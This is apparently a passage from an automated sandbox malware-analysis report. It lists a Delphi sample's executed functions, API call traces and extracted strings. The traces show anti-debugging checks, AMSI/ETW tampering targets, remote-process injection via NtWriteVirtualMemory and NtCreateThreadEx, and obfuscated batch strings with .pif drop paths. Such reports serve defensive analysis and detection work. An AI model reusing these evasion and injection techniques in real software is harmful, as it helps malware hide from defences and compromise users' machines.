29149->29151 29150->29142 29151->29087 29153 2b31c00 VirtualFree 29152->29153 29154 2b31ba4 29152->29154 29153->29087 29154->29087 29156 2b31681 29155->29156 29157 2b3164d 29155->29157 29156->29123 29157->29156 29158 2b3164f Sleep 29157->29158 29159 2b31664 29158->29159 29159->29156 29160 2b31668 Sleep 29159->29160 29160->29157

                                        Executed Functions

                                        Function 02B4EC74 Relevance: 243.3, APIs: 11, Strings: 122, Instructions: 10535filesleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InetIsOffline.URL(00000000,00000000,02B5AFA1,?,?,?,000002F7,00000000,00000000), ref: 02B4ECAE
                                          • Part of subcall function 02B48824: LoadLibraryA.KERNEL32(00000000,00000000,02B4890B), ref: 02B48858
                                          • Part of subcall function 02B48824: FreeLibrary.KERNEL32(74FA0000,00000000,02B91388,Function_000065D8,00000004,02B91398,02B91388,05F5E0FF,00000040,02B9139C,74FA0000,00000000,00000000,00000000,00000000,02B4890B), ref: 02B488EB
                                          • Part of subcall function 02B4EB94: GetModuleHandleW.KERNEL32(KernelBase,?,02B4EF98,UacInitialize,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,ScanBuffer,02B9137C,02B5AFD8,ScanString,02B9137C,02B5AFD8,Initialize), ref: 02B4EB9A
                                          • Part of subcall function 02B4EB94: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B4EBAC
                                          • Part of subcall function 02B4EBF0: GetModuleHandleW.KERNEL32(KernelBase), ref: 02B4EC00
                                          • Part of subcall function 02B4EBF0: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B4EC12
                                          • Part of subcall function 02B4EBF0: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B4EC29
                                          • Part of subcall function 02B37E18: GetFileAttributesA.KERNEL32(00000000,?,02B4F8CC,ScanString,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,ScanString,02B9137C,02B5AFD8,UacScan,02B9137C,02B5AFD8,UacInitialize), ref: 02B37E23
                                          • Part of subcall function 02B3C2EC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C858C8,?,02B4FBFE,ScanBuffer,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,ScanBuffer,02B9137C,02B5AFD8,OpenSession), ref: 02B3C303
                                          • Part of subcall function 02B4DBB0: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B4DC80), ref: 02B4DBEB
                                          • Part of subcall function 02B4DBB0: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B4DC80), ref: 02B4DC1B
                                          • Part of subcall function 02B4DBB0: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B4DC30
                                          • Part of subcall function 02B4DBB0: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B4DC5C
                                          • Part of subcall function 02B4DBB0: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B4DC65
                                          • Part of subcall function 02B37E3C: GetFileAttributesA.KERNEL32(00000000,?,02B52A49,ScanString,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,ScanBuffer,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,Initialize), ref: 02B37E47
                                          • Part of subcall function 02B37FD0: CreateDirectoryA.KERNEL32(00000000,00000000,?,02B52BE7,OpenSession,02B9137C,02B5AFD8,ScanString,02B9137C,02B5AFD8,Initialize,02B9137C,02B5AFD8,ScanString,02B9137C,02B5AFD8), ref: 02B37FDD
                                          • Part of subcall function 02B4DACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B4DB9E), ref: 02B4DB0B
                                          • Part of subcall function 02B4DACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B4DB45
                                          • Part of subcall function 02B4DACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B4DB72
                                          • Part of subcall function 02B4DACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B4DB7B
                                          • Part of subcall function 02B487A0: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02B913A4,02B4A3C7,ScanString,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,Initialize,02B913A4,02B4A77C,UacScan), ref: 02B487B4
                                          • Part of subcall function 02B487A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B487CE
                                          • Part of subcall function 02B487A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02B913A4,02B4A3C7,ScanString,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,Initialize), ref: 02B4880A
                                          • Part of subcall function 02B4870C: LoadLibraryW.KERNEL32(amsi), ref: 02B48715
                                          • Part of subcall function 02B4870C: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B48774
                                        • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,ScanBuffer,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,02B5B330), ref: 02B549B7
                                          • Part of subcall function 02B4DA44: RtlInitUnicodeString.NTDLL(?,?), ref: 02B4DA6C
                                          • Part of subcall function 02B4DA44: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B4DABE), ref: 02B4DA82
                                          • Part of subcall function 02B4DA44: NtDeleteFile.NTDLL(?), ref: 02B4DAA1
                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 02B54BB7
                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 02B54C0D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: File$Library$AddressFreeLoadModuleProc$AttributesCloseCreateHandleMove$CheckDebuggerDeleteDirectoryInetInformationInitNameOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                                        • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                        • API String ID: 3130226682-181751239
                                        • Opcode ID: 208c4a169fc6fe753851fb13f6207168ab9b448439ddd58962ce52fae9fbb353
                                        • Instruction ID: 70e54c992bc1c2e039e51162d6ce63f720a29f86221e9e58023364c7ba5c569f
                                        • Opcode Fuzzy Hash: 208c4a169fc6fe753851fb13f6207168ab9b448439ddd58962ce52fae9fbb353
                                        • Instruction Fuzzy Hash: 01242BB6A501688FDB12EB64DC80ADE73B6FF89310F1045E6E409EB254DA70EE85CF51
                                        Function 02B4AF58 Relevance: 50.8, APIs: 6, Strings: 22, Instructions: 1829nativethreadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 6797 2b4af58-2b4af5b 6798 2b4af60-2b4af65 6797->6798 6798->6798 6799 2b4af67-2b4b5f0 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b483e8 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 GetModuleHandleW call 2b480c8 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 NtOpenProcess call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b32ee0 call 2b32f08 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 6798->6799 7018 2b4b5f6-2b4b770 call 2b47b98 call 2b479b4 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 6799->7018 7019 2b4cb68-2b4cd9e call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b487a0 * 3 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b487a0 * 4 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 6799->7019 7018->7019 7115 2b4b776-2b4b7a6 call 2b4587c IsBadReadPtr 7018->7115 7156 2b4cda3-2b4cde0 call 2b344d0 * 3 7019->7156 7115->7019 7127 2b4b7ac-2b4b7b1 7115->7127 7127->7019 7129 2b4b7b7-2b4b7d3 IsBadReadPtr 7127->7129 7129->7019 7132 2b4b7d9-2b4b7e2 7129->7132 7132->7019 7134 2b4b7e8-2b4b80d 7132->7134 7134->7019 7136 2b4b813-2b4b98c call 2b47b98 call 2b479b4 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 7134->7136 7136->7019 7200 2b4b992-2b4bb08 call 2b479b4 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 7136->7200 7200->7019 7245 2b4bb0e-2b4bd7e call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b4ae14 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 7200->7245 7318 2b4bd84-2b4bd85 7245->7318 7319 2b4bf1c-2b4c07a call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 7245->7319 7321 2b4bd89-2b4bf16 call 2b4ae14 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 7318->7321 7404 2b4c0a6-2b4c8c6 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b4ae20 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b47d00 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 GetModuleHandleW call 2b480c8 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 NtCreateThreadEx call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 7319->7404 7405 2b4c07c-2b4c0a1 call 2b4ad64 7319->7405 7321->7319 7653 2b4c8cb-2b4cb63 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b3480c call 2b3494c call 2b346a4 call 2b34798 call 2b3494c call 2b346a4 call 2b48824 call 2b487a0 * 5 call 2b3480c call 2b3494c call 2b34798 call 2b3494c call 2b487a0 call 2b3480c call 2b3494c call 2b34798 call 2b3494c call 2b487a0 call 2b3480c call 2b3494c call 2b34798 call 2b3494c call 2b487a0 call 2b3480c call 2b3494c call 2b34798 call 2b3494c call 2b487a0 call 2b47ed4 call 2b487a0 * 2 7404->7653 7405->7404 7653->7019
                                        APIs
                                          • Part of subcall function 02B48824: LoadLibraryA.KERNEL32(00000000,00000000,02B4890B), ref: 02B48858
                                          • Part of subcall function 02B48824: FreeLibrary.KERNEL32(74FA0000,00000000,02B91388,Function_000065D8,00000004,02B91398,02B91388,05F5E0FF,00000040,02B9139C,74FA0000,00000000,00000000,00000000,00000000,02B4890B), ref: 02B488EB
                                        • GetModuleHandleW.KERNEL32(ntdll,NtOpenProcess,UacScan,02B9137C,02B4CE00,ScanString,02B9137C,02B4CE00,ScanBuffer,02B9137C,02B4CE00,ScanString,02B9137C,02B4CE00,UacScan,02B9137C), ref: 02B4B22A
                                          • Part of subcall function 02B480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B48150,?,?,00000000,00000000,?,02B48069,00000000,KernelBASE,00000000,00000000,02B48090), ref: 02B48115
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B4811B
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(?,?), ref: 02B4812D
                                        • NtOpenProcess.NTDLL(02B91580,001F0FFF,02B91318,02B91330), ref: 02B4B328
                                          • Part of subcall function 02B32EE0: QueryPerformanceCounter.KERNEL32 ref: 02B32EE4
                                          • Part of subcall function 02B479B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B47A27
                                        • IsBadReadPtr.KERNEL32(21DC0000,00000040), ref: 02B4B79F
                                        • IsBadReadPtr.KERNEL32(?,000000F8), ref: 02B4B7CC
                                          • Part of subcall function 02B47D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B47D74
                                        • GetModuleHandleW.KERNEL32(ntdll,NtCreateThreadEx,UacScan,02B9137C,02B4CE00,ScanString,02B9137C,02B4CE00,068D0000,068D0000,22230000,29BEE5B4,02B91584,OpenSession,02B9137C,02B4CE00), ref: 02B4C647
                                        • NtCreateThreadEx.NTDLL(02B9155C,02000000,02B91318,068D1656,068D1656,00000000,00000000,00000000,00000000,00000000,00000000,ScanBuffer,02B9137C,02B4CE00,UacInitialize,02B9137C), ref: 02B4C858
                                          • Part of subcall function 02B487A0: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02B913A4,02B4A3C7,ScanString,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,Initialize,02B913A4,02B4A77C,UacScan), ref: 02B487B4
                                          • Part of subcall function 02B487A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B487CE
                                          • Part of subcall function 02B487A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02B913A4,02B4A3C7,ScanString,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,Initialize), ref: 02B4880A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Library$AddressHandleModuleProc$FreeLoadMemoryReadVirtual$AllocateCounterCreateOpenPerformanceProcessQueryThreadWrite
                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtCreateThreadEx$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$ntdll
                                        • API String ID: 2727761209-1870492900
                                        • Opcode ID: edd9bacdf53b1376cd521f211d65f187f733342ecaa4cea517056825c64a8c91
                                        • Instruction ID: 6d31c710e2b78f5550263809feead1b8bfc67b54c0dbeefaed072733a41c9789
                                        • Opcode Fuzzy Hash: edd9bacdf53b1376cd521f211d65f187f733342ecaa4cea517056825c64a8c91
                                        • Instruction Fuzzy Hash: E9F22A71A911299FDB52EBA4CCC0BDEB7BAEF85710F1045E2A009AB214DF30AE459F51
                                        Function 02B35A78 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 7737 2b35a78-2b35ab9 GetModuleFileNameA RegOpenKeyExA 7738 2b35afb-2b35b3e call 2b358b4 RegQueryValueExA 7737->7738 7739 2b35abb-2b35ad7 RegOpenKeyExA 7737->7739 7746 2b35b62-2b35b7c RegCloseKey 7738->7746 7747 2b35b40-2b35b5c RegQueryValueExA 7738->7747 7739->7738 7740 2b35ad9-2b35af5 RegOpenKeyExA 7739->7740 7740->7738 7742 2b35b84-2b35bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 7740->7742 7744 2b35bbb-2b35bbf 7742->7744 7745 2b35c9e-2b35ca5 7742->7745 7750 2b35bc1-2b35bc5 7744->7750 7751 2b35bcb-2b35be1 lstrlenA 7744->7751 7747->7746 7748 2b35b5e 7747->7748 7748->7746 7750->7745 7750->7751 7752 2b35be4-2b35be7 7751->7752 7753 2b35bf3-2b35bfb 7752->7753 7754 2b35be9-2b35bf1 7752->7754 7753->7745 7756 2b35c01-2b35c06 7753->7756 7754->7753 7755 2b35be3 7754->7755 7755->7752 7757 2b35c30-2b35c32 7756->7757 7758 2b35c08-2b35c2e lstrcpynA LoadLibraryExA 7756->7758 7757->7745 7759 2b35c34-2b35c38 7757->7759 7758->7757 7759->7745 7760 2b35c3a-2b35c6a lstrcpynA LoadLibraryExA 7759->7760 7760->7745 7761 2b35c6c-2b35c9c lstrcpynA LoadLibraryExA 7760->7761 7761->7745
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B30000,02B5D790), ref: 02B35A94
                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B30000,02B5D790), ref: 02B35AB2
                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B30000,02B5D790), ref: 02B35AD0
                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B35AEE
                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B35B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B35B37
                                        • RegQueryValueExA.ADVAPI32(?,02B35CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B35B7D,?,80000001), ref: 02B35B55
                                        • RegCloseKey.ADVAPI32(?,02B35B84,00000000,?,?,00000000,02B35B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B35B77
                                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B35B94
                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B35BA1
                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B35BA7
                                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B35BD2
                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B35C19
                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B35C29
                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B35C51
                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B35C61
                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B35C87
                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B35C97
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                        • API String ID: 1759228003-2375825460
                                        • Opcode ID: 6bd88369c95bb04b779ba6a7e0225f435b890315ee24a471a2168cc642ee5ca0
                                        • Instruction ID: edc7d93ce5ce97e03d4a1a12a40ba1a1e9aff970d7ab0d2b778ba26a13816916
                                        • Opcode Fuzzy Hash: 6bd88369c95bb04b779ba6a7e0225f435b890315ee24a471a2168cc642ee5ca0
                                        • Instruction Fuzzy Hash: 16517771A5025C7EFB32DAA8CC46FEF77BDDB08744F8001E1AA44E6181E7749A448F64
